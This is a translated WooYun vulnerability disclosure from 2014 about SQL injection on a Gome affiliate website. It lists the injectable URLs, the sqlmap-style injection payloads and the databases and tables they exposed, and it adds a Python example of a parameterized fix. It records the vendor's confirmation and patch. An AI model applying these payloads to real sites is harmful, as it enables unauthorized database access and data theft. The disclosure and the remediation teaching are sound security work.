Vulnerability Summary

Bug ID: wooyun-2014-051102

Title: Collection of SQL injections on a Gome Online site

Vendor: Gome Holdings Group

Author: HackBraid

Submitted: 2014-02-16 14:53

Fixed: 2014-04-02 14:53

Publicly disclosed: 2014-04-02 14:53

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 6

Status: Confirmed by vendor

Source: http://www.wooyun.org

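Vulnerability Details

Disclosure status:

2014-02-16: Details sent to the vendor; awaiting vendor handling
2014-02-24: Vendor confirmed; details disclosed to the vendor only
2014-03-06: Details disclosed to core white hats and experts in related fields
2014-03-16: Details disclosed to regular white hats
2014-03-26: Details disclosed to intern white hats
2014-04-02: Details disclosed to the public

Brief description:

SQL injection

Detailed description: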

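Site:
http://cps.gome.com.cn/
Injection points:
1. http://cps.gome.com.cn/Home/NoticeDetail?id=132
2. http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E id=901
The site's fix for these injection points is incomplete: it only redirects, and the key parameter being passed is still not handled.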

Proof of vulnerability:

Taking the first injection point as an example:
Databases:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=132' AND 1148=1148 AND 'bVwH'='bVwH
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-1683' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(108)+CHAR(100)+CHAR(118)+CHAR(115)+CHAR(102)+CHAR(118)+CHAR(83)+CHAR(102)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(102)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=132'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=132' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] GomeCps
[*] master
[*] model
[*] msdb
[*] tempdb


Tables in the GomeCps database:

Database: GomeCps
[46 tables]
+-------------------------+
| Accounts |
| AdsCode |
| AdsCode |
| AdsUserSelf |
| BackupCookies |
| BannerAds |
| BaseCPSOriDataEffects |
| CPSNoEffectBanlce |
| CPSOriDataEffect_Backup |
| CPSOriDataEffect_Backup |
| CPSOriDataOccur_Backup |
| CPSOriDataOccur_Backup |
| CommissionByPcd |
| Commissions |
| CookiesRecent |
| Cookies_D |
| Cookies_D |
| CurrentSettlements |
| EarnerInfos |
| HelpSetUp |
| IpReport |
| IpReportRecent |
| MemberType |
| Notices |
| PageGroup |
| Payments |
| Products |
| RecommendedAd |
| RoleAuthority |
| Roles |
| SettlementHistorys |
| SettlementLogs |
| ShowComTop |
| SiteType |
| StageCommissionLogs |
| StageCommissionLogs |
| Taxs |
| TemporaryBackupCookies |
| Users |
| WebSites |
| categorysHistory |
| categorysHistory |
| modules |
| plan |
| sqlmapfile |
| sysdiagrams |
+-------------------------+

Remediation:

Handle the parameters being passed.
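
An added example, not part of the original report or the site's code: the id handling from the proof above, shown as a concatenated query next to a form that validates the value and binds it as a parameter. Python's sqlite3 stands in for the ASP.NET / SQL Server stack, and the Notices schema, its rows and all function names are constructed for illustration; the probe string is the boolean-based payload quoted in the proof.

```python
import sqlite3

# The boolean-based payload reported for the id parameter on this page.
PROBE = "132' AND 1148=1148 AND 'bVwH'='bVwH"

def make_db():
    """Constructed stand-in for the Notices table (sqlite3 instead of SQL Server)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Notices (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO Notices VALUES (?, ?)",
                   [(132, "constructed notice A"), (133, "constructed notice B")])
    return db

def notice_detail_concat(db, raw_id):
    """'Before' form: the request value becomes part of the SQL text."""
    sql = "SELECT id, title FROM Notices WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def parse_id(raw_id):
    """Accept only a short run of ASCII digits; anything else is rejected."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)

def notice_detail_bound(db, raw_id):
    """Hardened form: validate first, then pass the value as a bound parameter."""
    return db.execute("SELECT id, title FROM Notices WHERE id = ?",
                      (parse_id(raw_id),)).fetchall()

def bound_without_validation(db, raw_id):
    """Binding alone: the value is compared as data, never parsed as SQL."""
    return db.execute("SELECT id, title FROM Notices WHERE id = ?",
                      (raw_id,)).fetchall()

def is_rejected(raw_id):
    """True when the validation step refuses the value."""
    try:
        parse_id(raw_id)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    print("concat, probe:", notice_detail_concat(db, PROBE))
    print("bound only, probe:", bound_without_validation(db, PROBE))
    print("validated, probe rejected:", is_rejected(PROBE))
    print("validated, 132:", notice_detail_bound(db, "132"))
```

The concatenated form returns notice 132 for the probe, which shows the quote was parsed as SQL; the bound form matches nothing and the validator rejects the value outright. On the ASP.NET side the same pattern is an integer-typed id plus a SqlParameter on the command.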

Copyright notice: when reposting, please credit the source HackBraid@WooYun


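Vulnerability Response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2014-02-24 15:18

Vendor reply:

The vulnerability has been fixed. Thank you for your support.

Latest status:

None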